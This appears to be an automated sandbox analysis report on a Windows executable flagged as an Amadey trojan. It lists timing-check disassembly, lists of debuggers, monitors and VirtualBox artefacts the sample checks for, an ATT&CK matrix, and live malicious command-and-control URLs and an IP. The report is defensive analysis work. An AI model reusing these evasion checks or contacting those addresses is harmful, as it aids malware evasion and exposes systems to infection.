Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74313F1 second address: 7431469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [edx+1Ch], eax 0x00000009 jmp 00007F577C53EFCFh 0x0000000e mov eax, dword ptr [esi+20h] 0x00000011 jmp 00007F577C53EFD6h 0x00000016 mov dword ptr [edx+20h], eax 0x00000019 pushad 0x0000001a movzx eax, di 0x0000001d call 00007F577C53EFD3h 0x00000022 mov bx, si 0x00000025 pop eax 0x00000026 popad 0x00000027 mov eax, dword ptr [esi+24h] 0x0000002a jmp 00007F577C53EFCBh 0x0000002f mov dword ptr [edx+24h], eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F577C53EFD5h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7431469 second address: 7431495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F577C5415D7h 0x00000008 mov ax, A1FFh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esi+28h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 movsx edi, ax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7431495 second address: 743149A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743149A second address: 74314D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+28h], eax 0x0000000c jmp 00007F577C5415D6h 0x00000011 mov ecx, dword ptr [esi+2Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F577C5415CAh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74314D7 second address: 74314DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74314DB second address: 74314E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74314E1 second address: 74314E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74314E7 second address: 74314EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7431639 second address: 743165A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F57EC0AD08Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743165A second address: 743165E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 743165E second address: 7431664 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7431664 second address: 74316D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 pushfd 0x00000007 jmp 00007F577C5415CCh 0x0000000c adc ch, 00000038h 0x0000000f jmp 00007F577C5415CBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 or dword ptr [edx+38h], FFFFFFFFh 0x0000001c jmp 00007F577C5415D6h 0x00000021 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000025 pushad 0x00000026 jmp 00007F577C5415CEh 0x0000002b movzx eax, dx 0x0000002e popad 0x0000002f or dword ptr [edx+40h], FFFFFFFFh 0x00000033 pushad 0x00000034 mov esi, edi 0x00000036 movsx ebx, ax 0x00000039 popad 0x0000003a pop esi 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F577C5415CDh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74316D5 second address: 74316DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7470C03 second address: 7470C07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 7470C07 second address: 7470C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 742079F second address: 74207A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74207A3 second address: 74207E7 instructions: 0x00000000 rdtsc 0x00000002 mov cx, EB25h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dx, si 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F577C53EFD6h 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 push esi 0x00000018 pushad 0x00000019 popad 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F577C53EFD6h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74207E7 second address: 74207EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C0054 second address: 73C005A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C005A second address: 73C005E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C005E second address: 73C0070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, 0505A577h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C072C second address: 73C0731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C0731 second address: 73C0737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C0737 second address: 73C073B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C073B second address: 73C073F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C073F second address: 73C076E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop esi 0x0000000e pushfd 0x0000000f jmp 00007F577C5415CBh 0x00000014 jmp 00007F577C5415D3h 0x00000019 popfd 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C076E second address: 73C0793 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dl 0x00000005 mov edx, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F577C53EFD4h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C0793 second address: 73C0799 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C0799 second address: 73C07AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C53EFCDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C0AD5 second address: 73C0B2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F577C5415D6h 0x00000018 pushfd 0x00000019 jmp 00007F577C5415D2h 0x0000001e xor cl, 00000038h 0x00000021 jmp 00007F577C5415CBh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C0B2F second address: 73C0B76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F577C53EFCEh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F577C53EFD7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C0B76 second address: 73C0BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 80h 0x00000005 pushfd 0x00000006 jmp 00007F577C5415D0h 0x0000000b sbb al, 00000058h 0x0000000e jmp 00007F577C5415CBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C0BA5 second address: 73C0BA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C0BA9 second address: 73C0BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73C0BAF second address: 73C0BCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C53EFD9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74109DD second address: 74109E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74109E1 second address: 74109E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 74109E7 second address: 7410A3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push ecx 0x0000000c pushfd 0x0000000d jmp 00007F577C5415CDh 0x00000012 sbb cx, B9C6h 0x00000017 jmp 00007F577C5415D1h 0x0000001c popfd 0x0000001d pop eax 0x0000001e push ebx 0x0000001f mov ax, 8313h 0x00000023 pop esi 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov dh, 93h 0x0000002b mov eax, 66085703h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73F003D second address: 73F006B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F577C53EFD1h 0x0000000a sbb si, F546h 0x0000000f jmp 00007F577C53EFD1h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73F006B second address: 73F0118 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push ecx 0x0000000d pushfd 0x0000000e jmp 00007F577C5415D3h 0x00000013 add esi, 5BA4512Eh 0x00000019 jmp 00007F577C5415D9h 0x0000001e popfd 0x0000001f pop ecx 0x00000020 pushfd 0x00000021 jmp 00007F577C5415D1h 0x00000026 sub cl, 00000066h 0x00000029 jmp 00007F577C5415D1h 0x0000002e popfd 0x0000002f popad 0x00000030 and esp, FFFFFFF0h 0x00000033 pushad 0x00000034 movsx ebx, si 0x00000037 popad 0x00000038 sub esp, 44h 0x0000003b jmp 00007F577C5415D2h 0x00000040 xchg eax, ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F577C5415D7h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73F0118 second address: 73F0130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C53EFD4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73F0130 second address: 73F0134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73F0134 second address: 73F01D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F577C53EFCEh 0x0000000e xchg eax, ebx 0x0000000f jmp 00007F577C53EFD0h 0x00000014 xchg eax, esi 0x00000015 pushad 0x00000016 jmp 00007F577C53EFCEh 0x0000001b push esi 0x0000001c pushfd 0x0000001d jmp 00007F577C53EFD1h 0x00000022 add cl, 00000046h 0x00000025 jmp 00007F577C53EFD1h 0x0000002a popfd 0x0000002b pop eax 0x0000002c popad 0x0000002d push eax 0x0000002e pushad 0x0000002f mov eax, 215E71EFh 0x00000034 popad 0x00000035 xchg eax, esi 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 call 00007F577C53EFD7h 0x0000003e pop esi 0x0000003f call 00007F577C53EFD9h 0x00000044 pop ecx 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73F01D5 second address: 73F01DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73F01DB second address: 73F01DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73F01DF second address: 73F0216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F577C5415D0h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 mov ax, C66Dh 0x00000018 call 00007F577C5415CAh 0x0000001d pop eax 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: 73F0216 second address: 73F021C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSpecial instruction interceptor: First address: D9F851 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSpecial instruction interceptor: First address: D9D57A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSpecial instruction interceptor: First address: F41E6A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_00859980 rdtsc 0_2_00859980
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_0067255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0067255D
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_006729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_006729FF
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_0067255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0067255D
Source: E6rBvcWFWu.exe, E6rBvcWFWu.exe, 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: E6rBvcWFWu.exe, 00000000.00000002.1556312719.0000000001AF8000.00000004.00000020.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000003.1515213623.0000000001AD2000.00000004.00000020.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000003.1515339725.0000000001AF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJz0
Source: E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: E6rBvcWFWu.exeBinary or memory string: Hyper-V RAW
Source: E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: E6rBvcWFWu.exe, 00000000.00000003.1414694579.0000000001A82000.00000004.00000020.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000003.1415298793.0000000001A85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
Source: E6rBvcWFWu.exe, 00000000.00000003.1417254786.0000000006CA1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlQ=
Source: E6rBvcWFWu.exe, 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeThread information set: HideFromDebuggerJump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_074008F6 Start: 07400ADE End: 074009120_2_074008F6
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeFile opened: NTICE
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeFile opened: SICE
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_00859980 rdtsc 0_2_00859980
Source: E6rBvcWFWu.exe, E6rBvcWFWu.exe, 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: >/Program Manager
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.9:49730 -> 185.121.15.192:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
E6rBvcWFWu.exe65%VirustotalBrowse
E6rBvcWFWu.exe71%ReversingLabsWin32.Trojan.Amadey
E6rBvcWFWu.exe100%AviraTR/Crypt.TPM.Gen
E6rBvcWFWu.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850::3100%Avira URL Cloudmalware
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0100%Avira URL Cloudmalware
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=0U100%Avira URL Cloudmalware
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

